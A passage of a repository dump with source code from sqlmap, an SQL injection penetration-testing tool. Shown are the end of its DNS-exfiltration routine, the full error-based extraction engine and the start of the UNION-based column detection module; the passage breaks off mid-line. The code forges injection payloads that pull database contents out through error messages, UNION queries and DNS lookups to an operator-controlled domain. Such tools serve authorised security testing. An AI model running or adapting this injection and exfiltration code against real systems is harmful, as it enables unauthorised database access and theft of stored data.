hashDBRetrieve(expression, checkConf=True)\n\n        if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:\n            output = None\n\n        if output is None:\n            kb.dnsMode = True\n\n            while True:\n                count += 1\n                prefix, suffix = (\"%s\" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))\n                chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2\n                _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)\n                nulledCastedField = agent.nullAndCastField(fieldToCastStr)\n                extendedField = re.search(r\"[^ ,]*%s[^ ,]*\" % re.escape(fieldToCastStr), expression).group(0)\n                if extendedField != fieldToCastStr:  # e.g. MIN(surname)\n                    nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)\n                    fieldToCastStr = extendedField\n                nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)\n                nulledCastedField = agent.hexConvertField(nulledCastedField)\n                expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)\n\n                expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), \"dns_request\", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)\n                expressionUnescaped = unescaper.escape(expressionRequest)\n\n                if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):\n                    query = agent.prefixQuery(\"; %s\" % expressionUnescaped)\n                    query = \"%s%s\" % (query, queries[Backend.getIdentifiedDbms()].comment.query)\n                    forgedPayload = agent.payload(newValue=query)\n                else:\n                    forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))\n\n                Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)\n\n                _ = conf.dnsServer.pop(prefix, suffix)\n\n                if _:\n                    _ = extractRegexResult(r\"%s\\.(?P<result>.+)\\.%s\" % (prefix, suffix), _, re.I)\n                    _ = decodeDbmsHexValue(_)\n                    output = (output or \"\") + _\n                    offset += len(_)\n\n                    if len(_) < chunk_length:\n                        break\n                else:\n                    break\n\n            output = decodeDbmsHexValue(output) if conf.hexConvert else output\n\n            kb.dnsMode = False\n\n        if output is not None:\n            retVal = output\n\n            if kb.dnsTest is not None:\n                dataToStdout(\"[%s] [INFO] %s: %s\\n\" % (time.strftime(\"%X\"), \"retrieved\" if count > 0 else \"resumed\", safecharencode(output)))\n\n                if count > 0:\n                    hashDBWrite(expression, output)\n\n        if not kb.bruteMode:\n            debugMsg = \"performed %d quer%s in %.2f seconds\" % (count, 'y' if count == 1 else \"ies\", calculateDeltaSeconds(start))\n            logger.debug(debugMsg)\n\n    elif conf.dnsDomain:\n        warnMsg = \"DNS data exfiltration method through SQL injection \"\n        warnMsg += \"is currently not available for DBMS %s\" % Backend.getIdentifiedDbms()\n        singleTimeWarnMessage(warnMsg)\n\n    return safecharencode(retVal) if kb.safeCharEncode else retVal\n"
  },
  {
    "path": "sqlmap/lib/techniques/error/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/techniques/error/use.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport re\nimport time\n\nfrom lib.core.agent import agent\nfrom lib.core.bigarray import BigArray\nfrom lib.core.common import Backend\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import decodeDbmsHexValue\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import firstNotNone\nfrom lib.core.common import getConsoleWidth\nfrom lib.core.common import getPartRun\nfrom lib.core.common import getTechnique\nfrom lib.core.common import getTechniqueData\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import incrementCounter\nfrom lib.core.common import initTechnique\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import readInput\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import wasLastResponseHTTPError\nfrom lib.core.compat import xrange\nfrom lib.core.convert import decodeHex\nfrom lib.core.convert import getUnicode\nfrom lib.core.convert import htmlUnescape\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD\nfrom lib.core.settings import MAX_ERROR_CHUNK_LENGTH\nfrom lib.core.settings import MIN_ERROR_CHUNK_LENGTH\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PARTIAL_VALUE_MARKER\nfrom lib.core.settings import ROTATING_CHARS\nfrom lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD\nfrom lib.core.settings import SQL_SCALAR_REGEX\nfrom lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import runThreads\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.utils.progress import ProgressBar\nfrom lib.utils.safe2bin import safecharencode\nfrom thirdparty import six\n\ndef _oneShotErrorUse(expression, field=None, chunkTest=False):\n    offset = 1\n    rotator = 0\n    partialValue = None\n    threadData = getCurrentThreadData()\n    retVal = hashDBRetrieve(expression, checkConf=True)\n\n    if retVal and PARTIAL_VALUE_MARKER in retVal:\n        partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, \"\")\n        logger.info(\"resuming partial value: '%s'\" % _formatPartialContent(partialValue))\n        offset += len(partialValue)\n\n    threadData.resumed = retVal is not None and not partialValue\n\n    if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode:\n        debugMsg = \"searching for error chunk length...\"\n        logger.debug(debugMsg)\n\n        seen = set()\n        current = MAX_ERROR_CHUNK_LENGTH\n        while current >= MIN_ERROR_CHUNK_LENGTH:\n            testChar = str(current % 10)\n\n            if Backend.isDbms(DBMS.ORACLE):\n                testQuery = \"RPAD('%s',%d,'%s')\" % (testChar, current, testChar)\n            else:\n                testQuery = \"%s('%s',%d)\" % (\"REPEAT\" if Backend.isDbms(DBMS.MYSQL) else \"REPLICATE\", testChar, current)\n                testQuery = \"SELECT %s\" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery)\n\n            result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True))\n            seen.add(current)\n\n            if (result or \"\").startswith(testChar):\n                if result == testChar * current:\n                    kb.errorChunkLength = current\n                    break\n                else:\n                    result = re.search(r\"\\A\\w+\", result).group(0)\n                    candidate = len(result) - len(kb.chars.stop)\n                    current = candidate if candidate != current and candidate not in seen else current - 1\n            else:\n                current = current // 2\n\n        if kb.errorChunkLength:\n            hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength)\n        else:\n            kb.errorChunkLength = 0\n\n    if retVal is None or partialValue:\n        try:\n            while True:\n                check = r\"(?si)%s(?P<result>.*?)%s\" % (kb.chars.start, kb.chars.stop)\n                trimCheck = r\"(?si)%s(?P<result>[^<\\n]*)\" % kb.chars.start\n\n                if field:\n                    nulledCastedField = agent.nullAndCastField(field)\n\n                    if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in (\"COUNT\", \"CASE\")) and kb.errorChunkLength and not chunkTest:\n                        extendedField = re.search(r\"[^ ,]*%s[^ ,]*\" % re.escape(field), expression).group(0)\n                        if extendedField != field:  # e.g. MIN(surname)\n                            nulledCastedField = extendedField.replace(field, nulledCastedField)\n                            field = extendedField\n                        nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength)\n\n                # Forge the error-based SQL injection request\n                vector = getTechniqueData().vector\n                query = agent.prefixQuery(vector)\n                query = agent.suffixQuery(query)\n                injExpression = expression.replace(field, nulledCastedField, 1) if field else expression\n                injExpression = unescaper.escape(injExpression)\n                injExpression = query.replace(\"[QUERY]\", injExpression)\n                payload = agent.payload(newValue=injExpression)\n\n                # Perform the request\n                page, headers, _ = Request.queryPage(payload, content=True, raise404=False)\n\n                incrementCounter(getTechnique())\n\n                if page and conf.noEscape:\n                    page = re.sub(r\"('|\\%%27)%s('|\\%%27).*?('|\\%%27)%s('|\\%%27)\" % (kb.chars.start, kb.chars.stop), \"\", page)\n\n                # Parse the returned page to get the exact error-based\n                # SQL injection output\n                output = firstNotNone(\n                    extractRegexResult(check, page),\n                    extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),\n                    extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),\n                    extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)\n                )\n\n                if output is not None:\n                    output = getUnicode(output)\n                else:\n                    trimmed = firstNotNone(\n                        extractRegexResult(trimCheck, page),\n                        extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),\n                        extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),\n                        extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)\n                    )\n\n                    if trimmed:\n                        if not chunkTest:\n                            warnMsg = \"possible server trimmed output detected \"\n                            warnMsg += \"(due to its length and/or content): \"\n                            warnMsg += safecharencode(trimmed)\n                            logger.warning(warnMsg)\n\n                        if not kb.testMode:\n                            check = r\"(?P<result>[^<>\\n]*?)%s\" % kb.chars.stop[:2]\n                            output = extractRegexResult(check, trimmed, re.IGNORECASE)\n\n                            if not output:\n                                check = r\"(?P<result>[^\\s<>'\\\"]+)\"\n                                output = extractRegexResult(check, trimmed, re.IGNORECASE)\n                            else:\n                                output = output.rstrip()\n\n                if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)):\n                    if offset == 1:\n                        retVal = output\n                    else:\n                        retVal += output if output else ''\n\n                    if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest:\n                        offset += kb.errorChunkLength\n                    else:\n                        break\n\n                    if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)):\n                        if kb.fileReadMode:\n                            dataToStdout(_formatPartialContent(output).replace(r\"\\n\", \"\\n\").replace(r\"\\t\", \"\\t\"))\n                        elif offset > 1:\n                            rotator += 1\n\n                            if rotator >= len(ROTATING_CHARS):\n                                rotator = 0\n\n                            dataToStdout(\"\\r%s\\r\" % ROTATING_CHARS[rotator])\n                else:\n                    retVal = output\n                    break\n        except:\n            if retVal is not None:\n                hashDBWrite(expression, \"%s%s\" % (retVal, PARTIAL_VALUE_MARKER))\n            raise\n\n        retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal\n\n        if isinstance(retVal, six.string_types):\n            retVal = htmlUnescape(retVal).replace(\"<br>\", \"\\n\")\n\n        retVal = _errorReplaceChars(retVal)\n\n        if retVal is not None:\n            hashDBWrite(expression, retVal)\n\n    else:\n        _ = \"(?si)%s(?P<result>.*?)%s\" % (kb.chars.start, kb.chars.stop)\n        retVal = extractRegexResult(_, retVal) or retVal\n\n    return safecharencode(retVal) if kb.safeCharEncode else retVal\n\ndef _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False):\n    values = []\n    origExpr = None\n\n    width = getConsoleWidth()\n    threadData = getCurrentThreadData()\n\n    for field in expressionFieldsList:\n        output = None\n\n        if field.startswith(\"ROWNUM \"):\n            continue\n\n        if isinstance(num, int):\n            origExpr = expression\n            expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])\n\n        if \"ROWNUM\" in expressionFieldsList:\n            expressionReplaced = expression\n        else:\n            expressionReplaced = expression.replace(expressionFields, field, 1)\n\n        output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)\n\n        if not kb.threadContinue:\n            return None\n\n        if not any((suppressOutput, kb.bruteMode)):\n            if kb.fileReadMode and output and output.strip():\n                print()\n            elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields):\n                status = \"[%s] [INFO] %s: '%s'\" % (time.strftime(\"%X\"), \"resumed\" if threadData.resumed else \"retrieved\", output if kb.safeCharEncode else safecharencode(output))\n\n                if len(status) > width:\n                    status = \"%s...\" % status[:width - 3]\n\n                dataToStdout(\"%s\\n\" % status)\n\n        if isinstance(num, int):\n            expression = origExpr\n\n        values.append(output)\n\n    return values\n\ndef _errorReplaceChars(value):\n    \"\"\"\n    Restores safely replaced characters\n    \"\"\"\n\n    retVal = value\n\n    if value:\n        retVal = retVal.replace(kb.chars.space, \" \").replace(kb.chars.dollar, \"$\").replace(kb.chars.at, \"@\").replace(kb.chars.hash_, \"#\")\n\n    return retVal\n\ndef _formatPartialContent(value):\n    \"\"\"\n    Prepares (possibly hex-encoded) partial content for safe console output\n    \"\"\"\n\n    if value and isinstance(value, six.string_types):\n        try:\n            value = decodeHex(value, binary=False)\n        except:\n            pass\n        finally:\n            value = safecharencode(value)\n\n    return value\n\ndef errorUse(expression, dump=False):\n    \"\"\"\n    Retrieve the output of a SQL query taking advantage of the error-based\n    SQL injection vulnerability on the affected parameter.\n    \"\"\"\n\n    initTechnique(getTechnique())\n\n    abortedFlag = False\n    count = None\n    emptyFields = []\n    start = time.time()\n    startLimit = 0\n    stopLimit = None\n    value = None\n\n    _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)\n\n    # Set kb.partRun in case the engine is called from the API\n    kb.partRun = getPartRun(alias=False) if conf.api else None\n\n    # We have to check if the SQL query might return multiple entries\n    # and in such case forge the SQL limiting the query output one\n    # entry at a time\n    # NOTE: we assume that only queries that get data from a table can\n    # return multiple entries\n    if (dump and (conf.limitStart or conf.limitStop)) or (\" FROM \" in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and (\"(CASE\" not in expression.upper() or (\"(CASE\" in expression.upper() and \"WHEN use\" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):\n        expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)\n\n        if limitCond:\n            # Count the number of SQL query entries output\n            countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)\n\n            if \" ORDER BY \" in countedExpression.upper():\n                _ = countedExpression.upper().rindex(\" ORDER BY \")\n                countedExpression = countedExpression[:_]\n\n            _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)\n            count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields))\n\n            if isNumPosStrValue(count):\n                if isinstance(stopLimit, int) and stopLimit > 0:\n                    stopLimit = min(int(count), int(stopLimit))\n                else:\n                    stopLimit = int(count)\n\n                    debugMsg = \"used SQL query returns \"\n                    debugMsg += \"%d %s\" % (stopLimit, \"entries\" if stopLimit > 1 else \"entry\")\n                    logger.debug(debugMsg)\n\n            elif count and not count.isdigit():\n                warnMsg = \"it was not possible to count the number \"\n                warnMsg += \"of entries for the SQL query provided. \"\n                warnMsg += \"sqlmap will assume that it returns only \"\n                warnMsg += \"one entry\"\n                logger.warning(warnMsg)\n\n                stopLimit = 1\n\n            elif (not count or int(count) == 0):\n                if not count:\n                    warnMsg = \"the SQL query provided does not \"\n                    warnMsg += \"return any output\"\n                    logger.warning(warnMsg)\n                else:\n                    value = []  # for empty tables\n                return value\n\n            if isNumPosStrValue(count) and int(count) > 1:\n                if \" ORDER BY \" in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:\n                    message = \"due to huge table size do you want to remove \"\n                    message += \"ORDER BY clause gaining speed over consistency? [y/N] \"\n\n                    if readInput(message, default='N', boolean=True):\n                        expression = expression[:expression.index(\" ORDER BY \")]\n\n                numThreads = min(conf.threads, (stopLimit - startLimit))\n\n                threadData = getCurrentThreadData()\n\n                try:\n                    threadData.shared.limits = iter(xrange(startLimit, stopLimit))\n                except OverflowError:\n                    errMsg = \"boundary limits (%d,%d) are too large. Please rerun \" % (startLimit, stopLimit)\n                    errMsg += \"with switch '--fresh-queries'\"\n                    raise SqlmapDataException(errMsg)\n\n                threadData.shared.value = BigArray()\n                threadData.shared.buffered = []\n                threadData.shared.counter = 0\n                threadData.shared.lastFlushed = startLimit - 1\n                threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1\n\n                if threadData.shared.showEta:\n                    threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))\n\n                if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):\n                    for field in expressionFieldsList:\n                        if _oneShotErrorUse(\"SELECT COUNT(%s) FROM %s\" % (field, kb.dumpTable)) == '0':\n                            emptyFields.append(field)\n                            debugMsg = \"column '%s' of table '%s' will not be \" % (field, kb.dumpTable)\n                            debugMsg += \"dumped as it appears to be empty\"\n                            logger.debug(debugMsg)\n\n                if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:\n                    kb.suppressResumeInfo = True\n                    debugMsg = \"suppressing possible resume console info because of \"\n                    debugMsg += \"large number of rows. It might take too long\"\n                    logger.debug(debugMsg)\n\n                try:\n                    def errorThread():\n                        threadData = getCurrentThreadData()\n\n                        while kb.threadContinue:\n                            with kb.locks.limit:\n                                try:\n                                    threadData.shared.counter += 1\n                                    num = next(threadData.shared.limits)\n                                except StopIteration:\n                                    break\n\n                            output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)\n\n                            if not kb.threadContinue:\n                                break\n\n                            if output and isListLike(output) and len(output) == 1:\n                                output = unArrayizeValue(output)\n\n                            with kb.locks.value:\n                                index = None\n                                if threadData.shared.showEta:\n                                    threadData.shared.progress.progress(threadData.shared.counter)\n                                for index in xrange(1 + len(threadData.shared.buffered)):\n                                    if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:\n                                        break\n                                threadData.shared.buffered.insert(index or 0, (num, output))\n                                while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:\n                                    threadData.shared.lastFlushed += 1\n                                    threadData.shared.value.append(threadData.shared.buffered[0][1])\n                                    del threadData.shared.buffered[0]\n\n                    runThreads(numThreads, errorThread)\n\n                except KeyboardInterrupt:\n                    abortedFlag = True\n                    warnMsg = \"user aborted during enumeration. sqlmap \"\n                    warnMsg += \"will display partial output\"\n                    logger.warning(warnMsg)\n\n                finally:\n                    threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))\n                    value = threadData.shared.value\n                    kb.suppressResumeInfo = False\n\n    if not value and not abortedFlag:\n        value = _errorFields(expression, expressionFields, expressionFieldsList)\n\n    if value and isListLike(value):\n        if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))):\n            value = unArrayizeValue(value)\n        elif len(value) > 1 and stopLimit == 1:\n            value = [value]\n\n    duration = calculateDeltaSeconds(start)\n\n    if not kb.bruteMode:\n        debugMsg = \"performed %d quer%s in %.2f seconds\" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else \"ies\", duration)\n        logger.debug(debugMsg)\n\n    return value\n"
  },
  {
    "path": "sqlmap/lib/techniques/union/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/techniques/union/test.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport itertools\nimport logging\nimport random\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.common import average\nfrom lib.core.common import Backend\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import isNullValue\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import removeReflectiveValues\nfrom lib.core.common import setTechnique\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import stdev\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.enums import FUZZ_UNION_COLUMN\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.settings import FUZZ_UNION_ERROR_REGEX\nfrom lib.core.settings import FUZZ_UNION_MAX_COLUMNS\nfrom lib.core.settings import LIMITED_ROWS_TEST_NUMBER\nfrom lib.core.settings import MAX_RATIO\nfrom lib.core.settings import MIN_RATIO\nfrom lib.core.settings import MIN_STATISTICAL_RANGE\nfrom lib.core.settings import MIN_UNION_RESPONSES\nfrom lib.core.settings import NULL\nfrom lib.core.settings import ORDER_BY_MAX\nfrom lib.core.settings import ORDER_BY_STEP\nfrom lib.core.settings import UNION_MIN_RESPONSE_CHARS\nfrom lib.core.settings import UNION_STDEV_COEFF\nfrom lib.core.unescaper import unescaper\nfrom lib.request.comparison import comparison\nfrom lib.request.connect import Connect as Request\n\ndef _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):\n    \"\"\"\n    Finds number of columns affected by UNION based injection\n    \"\"\"\n    retVal = None\n\n    @stackedmethod\n    def _orderByTechnique(lowerCount=None, upperCount=None):\n        def _orderByTest(cols):\n            query = agent.prefixQuery(\"ORDER BY %d\" % cols, prefix=prefix)\n            query = agent.suffixQuery(query, suffix=suffix, comment=comment)\n            payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)\n            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)\n            return not any(re.search(_, page or \"\", re.I) and not re.search(_, kb.pageTemplate or \"\", re.I) for _ in (\"(warning|error):\", \"order (by|clause)\", \"unknown column\", \"failed\")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r\"data types cannot be compared or sorted\", page or \"\", re.I) is not None\n\n        if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):\n            infoMsg = \"'ORDER BY' technique appears to be usable. \"\n            infoMsg += \"This should reduce the time needed \"\n            infoMsg += \"to find the right number \"\n            infoMsg += \"of query columns. Automatically extending the \"\n            infoMsg += \"range for current UNION query injection technique test\"\n            singleTimeLogMessage(infoMsg)\n\n            lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount\n            found = None\n            while not found:\n                if not conf.uCols and _orderByTest(highCols):\n                    lowCols = highCols\n                    highCols += ORDER_BY_STEP\n\n                    if highCols > ORDER_BY_MAX:\n                        break\n                else:\n                    while not found:\n                        mid = highCols - (highCols - lowCols) // 2\n                        if _orderByTest(mid):\n                            lowCols = mid\n                        else:\n                            highCols = mid\n                        if (highCols - lowCols) < 2:\n                            found = lowCols\n\n            return found\n\n    try:\n        pushValue(kb.errorIsNone)\n        items, ratios = [], []\n        kb.errorIsNone = False\n        lowerCount, upperCount = conf.uColsStart, conf.uColsStop\n\n        if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols):  # Note: ORDER BY is not bullet-proof\n            found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()\n\n            if found:\n                kb.orderByColumns = found\n                infoMsg = \"target URL appears to have %d column%s in query\" % (found, 's' if found > 1 else \"\")\n                singleTimeLogMessage(infoMsg)\n                return found\n            elif kb.futileUnion:\n                return None\n\n        if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:\n            upperCount = lowerCount + MIN_UNION_RESPONSES\n\n        min_, max_ = MAX_RATIO, MIN_RATIO\n        pages = {}\n\n        for count in xrange(lowerCount, upperCount + 1):\n            query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)\n            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)\n            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)\n\n            if not isNullValue(kb.uChar):\n                pages[count] = page\n\n            ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO\n            ratios.append(ratio)\n            min_, max_ = min(min_, ratio), max(max_, ratio)\n            items.append((count, ratio))\n\n        if not isNullValue(kb.uChar):\n            for regex in (kb.uChar.strip(\"'\"), r'>\\s*%s\\s*<' % kb.uChar.strip(\"'\")):\n                contains = [count for count, content in pages.items() if re.search(regex, content or \"\", re.IGNORECASE) is not None]\n                if len(contains) == 1:\n                    retVal = contains[0]\n                    break\n\n        if not retVal:\n            if min_ in ratios:\n                ratios.pop(ratios.index(min_))\n            if max_ in ratios:\n                ratios.pop(ratios.index(max_))\n\n            minItem, maxItem = None, None\n\n            for item in items:\n                if item[1] == min_:\n                    minItem = item\n                elif item[1] == max_:\n                    maxItem = item\n\n            if all(_ == min_ and _ != max_ for _ in ratios):\n                retVal = maxItem[0]\n\n            elif all(_ != min_ and _ == max_ for _ in ratios):\n                retVal = minItem[0]\n\n            elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:\n                deviation = stdev(ratios)\n\n                if deviation is not None:\n                    lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation\n\n                    if min_ < lower:\n                        retVal = minItem[0]\n\n                    if max_ > upper:\n                        if retVal is None or abs(max_ - upper) > abs(min_ - lower):\n                            retVal = maxItem[0]\n    finally:\n        kb.errorIsNone = popValue()\n\n    if retVal:\n        infoMsg = \"target URL appears to be UNION injectable with %d columns\" % retVal\n        singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r\"\\d+\", 'N', infoMsg))\n\n    return retVal\n\ndef _fuzzUnionCols(place, parameter, prefix, suffix):\n    retVal = None\n\n    if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or \"\") and kb.orderByColumns:\n        comment = queries[Backend.getIdentifiedDbms()].comment.query\n\n        choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)\n        random.shuffle(choices)\n\n        for candidate in itertools.product(choices, repeat=kb.orderByColumns):\n            if retVal:\n                break\n            elif FUZZ_UNION_COLUMN.STRING not in candidate:\n                continue\n            else:\n                candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, \"'%s'\" % randomStr(20)) for _ in candidate]\n\n            query = agent.prefixQuery(\"UNION ALL SELECT %s%s\" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), \"\")), prefix=prefix)\n            query = agent.suffixQuery(query, suffix=suffix, comment=comment)\n            payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)\n            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)\n\n            if not re.search(FUZZ_UNION_ERROR_REGEX, page or \"\"):\n                for column in candidate:\n                    if column.startswith(\"'\") and column.strip(\"'\") in (page or \"\"):\n                        retVal = [(_ if _ != column else \"%s\") for _ in candidate]\n                        break\n\n    return retVal\n\ndef _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):\n    validPayload = None\n    vector = None\n\n    positions = [_ for _ in xrange(0, count)]\n\n    # Unbiased approach for searching appropriate usable column\n    random.shuffle(positions)\n\n    for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):\n        if vector:\n            break\n\n        # For each column of the table (# of NULL) perform a request using\n        # the UNION ALL SELECT statement to test it the target URL is\n        # affected by an exploitable union SQL injection vulnerability\n        for position in positions:\n            # Prepare expression with delimiters\n            randQuery = randomStr(charCount)\n            phrase = (\"%s%s%s\" % (kb.chars.start, randQuery, kb.chars.stop)).lower()\n            randQueryProcessed = agent.concatQuery(\"\\'%s\\'\" % randQuery)\n            randQueryUnescaped = unescaper.escape(randQueryProcessed)\n\n            # Forge the union SQL injection request\n            query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)\n            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)\n\n            # Perform the request\n            page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)\n            content = (\"%s%s\" % (removeReflectiveValues(page, payload) or \"\", removeReflectiveValues(listToStrValue(headers.headers if headers 